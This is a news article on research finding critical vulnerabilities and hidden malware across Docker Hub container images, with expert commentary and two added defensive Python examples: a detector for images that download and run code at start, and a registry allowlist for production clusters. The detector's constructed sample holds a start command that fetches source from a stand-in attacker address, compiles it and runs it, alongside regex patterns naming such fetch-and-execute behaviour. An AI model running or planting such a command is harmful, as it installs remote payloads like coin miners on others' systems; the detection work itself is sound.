Most Docker container images have critical flaws

Developers must vet the images they pull to prevent further spread of malware

Over two million container images hosted on the Docker Hub repository harbor at least one critical vulnerability, according to new research. 

In an analysis carried out by cyber security firm Prevasio on four million container images, over half (51%) contained at least one critical vulnerability.

The research also found container images carrying embedded malware: 6,432 images were malicious or potentially harmful, representing 0.16% of all publicly available images on Docker Hub.

“Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coin miner, to then compile and execute it,” said Sergei Shevchenko, CTO at Prevasio.
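The runtime download-and-execute pattern Shevchenko describes is exactly what an at-rest file scan misses: the stored layers contain no malicious binary. As an added example (not Prevasio's tooling or anything from the report), the Python below is a small heuristic that inspects an image's per-layer instructions and its entrypoint/cmd, flags any line that fetches something from the network and runs, compiles or decodes it in the same command, and separately flags a network fetch in the start command at all. The sample image histories, entrypoints and the 198.51.100.7 address are constructed for the example.

```python
"""Heuristic detector for 'dynamic payload' images (added example, not
Prevasio's tooling). It inspects the per-layer instructions and the
entrypoint/cmd of an image and flags download-and-execute patterns that an
at-rest file scan would miss because the stored image has no malicious binary."""
import re
from dataclasses import dataclass, field

# Tools that pull content from the network.
FETCH_RE = re.compile(r"\b(curl|wget|git\s+clone)\b")
# Ways of turning fetched content into running code on the same command line:
# pipe into a shell or interpreter, compile it, mark it executable, or decode it.
EXEC_RE = re.compile(
    r"\|\s*(ba|z|da)?sh\b|\|\s*python[23]?\b|\bchmod\s+\+x\b"
    r"|\b(gcc|cc|make|go\s+build)\b|\bbase64\s+(-d|--decode)\b"
)


@dataclass
class Finding:
    where: str          # "layer" (a build-time RUN layer) or "start" (entrypoint + cmd)
    instruction: str
    reasons: list = field(default_factory=list)


def classify(instruction, where):
    """Return a Finding, or None. A layer is flagged only when it fetches and
    executes in one line (installing curl by itself is normal). The start
    command is flagged for any network fetch at all: a payload pulled at
    container start is invisible to a scan of the image's layers."""
    fetch = FETCH_RE.search(instruction)
    execute = EXEC_RE.search(instruction)
    reasons = []
    if fetch and execute:
        reasons.append(f"download-and-execute: {fetch.group(0)} ... {execute.group(0)}")
    elif fetch and where == "start":
        reasons.append(f"network fetch at container start: {fetch.group(0)}")
    return Finding(where, instruction, reasons) if reasons else None


def analyze_image(history, entrypoint, cmd):
    """history: per-layer instructions (the created_by field that
    `docker history`/`docker inspect` report, with the '/bin/sh -c' prefix
    stripped); entrypoint/cmd: the exec-form lists from the image config."""
    findings = [f for f in (classify(h, "layer") for h in history) if f]
    start = classify(" ".join(list(entrypoint) + list(cmd)), "start")
    if start:
        findings.append(start)
    return findings


# Constructed sample images (not real Docker Hub content). 198.51.100.7 is a
# documentation address standing in for the attacker's host.
BENIGN = dict(
    history=["apt-get update && apt-get install -y --no-install-recommends nginx",
             "COPY nginx.conf /etc/nginx/nginx.conf"],
    entrypoint=["nginx"], cmd=["-g", "daemon off;"],
)
DYNAMIC = dict(
    history=["apt-get update && apt-get install -y build-essential curl"],
    entrypoint=["sh", "-c"],
    cmd=["curl -fsSL http://198.51.100.7/src.tgz | tar xz && make -C src && ./src/worker"],
)

if __name__ == "__main__":
    for name, image in (("benign", BENIGN), ("dynamic", DYNAMIC)):
        for f in analyze_image(**image):
            print(f"{name}: [{f.where}] {f.reasons[0]}")
```

The benign image installs nothing over the network at start and is not flagged; the second image is clean on disk but its start command pulls source, compiles it with make and runs the result, which is the coin-miner pattern in the quote. Treat this as a triage signal, not a verdict: a payload fetched by an obfuscated command, or by the application's own code after start, will not match these patterns, so pair the static check with egress monitoring of what the running container actually connects to.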

In its report, Prevasio said that if a developer takes a shortcut by fetching a pre-built image instead of building a new one from scratch, there is a real risk that the pre-built image comes with a Trojan installed. If such an image ends up in production, attackers may gain remote access to the containerized application through its backdoor.

Mark Bower, senior vice president at Comforte AG, told IT Pro that platforms like Kubernetes enable immense application delivery power. However, the built-in security controls reflect classical data-at-rest and transport encryption, perimeter, and access control-based security. 

“While these controls are important, the last decade has seen leading enterprises and data processors shift towards data-centric over perimeter controls to combat advanced malware, ransomware and insider risk to sensitive data,” Bower said.

“Fundamentally, to thwart the variations of malware and attacks from misconfiguration or API exploitation, a data-centric approach is vital even with advanced container and app orchestration ecosystems to avoid data compromise or attacks that can create havoc for data-hungry enterprises depending on them.”

Tim Mackey, principal security strategist at the Synopsys CyRC (Cybersecurity Research Centre), told IT Pro that when selecting an image from Docker Hub, a development team is implicitly stating that they trust the security practices of the author of that container image. 

“Such implicit trust is risky from a security perspective, which is why many organizations are now creating hardened container images where the image hardening process is managed by a dedicated team skilled in operating system hardening which is separate from the core development team.

“These hardened images are then pushed to an internal registry and policies are defined that only allow images originating from hardened images in that internal registry to execute in a production cluster,” Mackey said.
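The policy Mackey describes, as an added example that is not Synopsys', Kubernetes' or any policy engine's code: the decision logic a validating admission webhook (or a Kyverno/Gatekeeper rule) would apply to each Pod so that only images from the internal registry's hardened namespace, pinned by digest, can run in the production cluster. The registry name registry.internal.example, the hardened/ namespace, the placeholder digest and the Pod spec are assumptions made for the example. The parts that commonly go wrong in such a check are exactly what the code spells out: parsing image references the way the distribution rules do (implicit docker.io, registry ports, digests), comparing the registry as an exact hostname rather than a substring, and walking init and ephemeral containers as well as the main ones.

```python
"""Registry allowlist for a production cluster (added example; not Synopsys',
Kubernetes' or any policy engine's code). This is the decision logic a
validating admission webhook, or a Kyverno/Gatekeeper rule, would apply to
each Pod: every container image must come from the internal registry, from
the namespace the hardening team publishes to, and be pinned by digest.
registry.internal.example, the hardened/ namespace and the Pod are assumed."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ImageRef:
    registry: str
    repository: str
    tag: Optional[str]
    digest: Optional[str]


DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


def parse_image_ref(ref):
    """Split a reference by the Docker/OCI distribution rules: the first path
    component is a registry only if it contains '.' or ':' or is 'localhost';
    otherwise the default docker.io applies and single-component names live
    under library/. Getting this wrong is how 'nginx' slips past a check that
    only looks for an allowed registry string somewhere in the name."""
    name, at, digest = ref.partition("@")
    if at:
        if not DIGEST_RE.match(digest):
            raise ValueError(f"malformed digest in {ref!r}")
    else:
        digest = None
    first, sep, rest = name.partition("/")
    if sep and ("." in first or ":" in first or first == "localhost"):
        registry, path = first, rest
    else:
        registry, path = "docker.io", name
        if "/" not in path:
            path = "library/" + path
    # The tag is whatever follows the last ':' in the final path component;
    # a ':' belonging to a registry port was already peeled off above.
    tag = None
    colon = path.rfind(":")
    if colon > path.rfind("/"):
        path, tag = path[:colon], path[colon + 1:]
    return ImageRef(registry, path, tag, digest)


@dataclass(frozen=True)
class Policy:
    allowed_registries: frozenset   # exact hostnames, never substring matches
    allowed_prefixes: tuple         # repository prefixes the hardening team owns
    require_digest: bool = True


def check_image(ref, policy):
    """Return None if the image is allowed, otherwise the reason it is not."""
    try:
        img = parse_image_ref(ref)
    except ValueError as e:
        return str(e)
    if img.registry not in policy.allowed_registries:
        return f"{ref}: registry {img.registry!r} is not the internal registry"
    if not img.repository.startswith(policy.allowed_prefixes):
        return f"{ref}: repository {img.repository!r} is outside the hardened image namespace"
    if policy.require_digest and img.digest is None:
        return f"{ref}: not pinned by digest; a mutable tag can be repointed after review"
    return None


def pod_violations(pod, policy):
    """Check every container kind: init and ephemeral containers run too, so a
    rule that only reads spec.containers is bypassable."""
    spec = pod.get("spec", {})
    out = []
    for kind in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(kind, []):
            reason = check_image(c.get("image", ""), policy)
            if reason:
                out.append(f"{kind}/{c.get('name', '?')}: {reason}")
    return out


# Constructed policy and Pod spec for the example.
POLICY = Policy(allowed_registries=frozenset({"registry.internal.example"}),
                allowed_prefixes=("hardened/",))
DIGEST = "sha256:" + "a" * 64   # placeholder digest, not a real image
SAMPLE_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
    "spec": {
        "initContainers": [
            {"name": "migrate", "image": f"registry.internal.example/hardened/migrate:1.4@{DIGEST}"}],
        "containers": [
            {"name": "app", "image": f"registry.internal.example/hardened/python:3.11@{DIGEST}"},
            # look-alike registry: passes a substring check, fails an exact one
            {"name": "sidecar", "image": "registry.internal.example.attacker.invalid/hardened/python:3.11"},
            {"name": "cache", "image": "redis:7"},                       # implicit docker.io
            {"name": "dbg", "image": f"registry.internal.example/team-x/debug:latest@{DIGEST}"},
        ],
    },
}

if __name__ == "__main__":
    for v in pod_violations(SAMPLE_POD, POLICY):
        print("DENY", v)
```

Run against the sample Pod, the two hardened, digest-pinned images pass and three containers are denied: the look-alike registry, the bare `redis:7` that silently resolves to docker.io, and the digest-pinned image that lives outside the hardened namespace. Requiring a digest is what makes the hardening team's review meaningful: a tag such as `:3.11` can be repointed in the registry after the review, a sha256 digest cannot.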
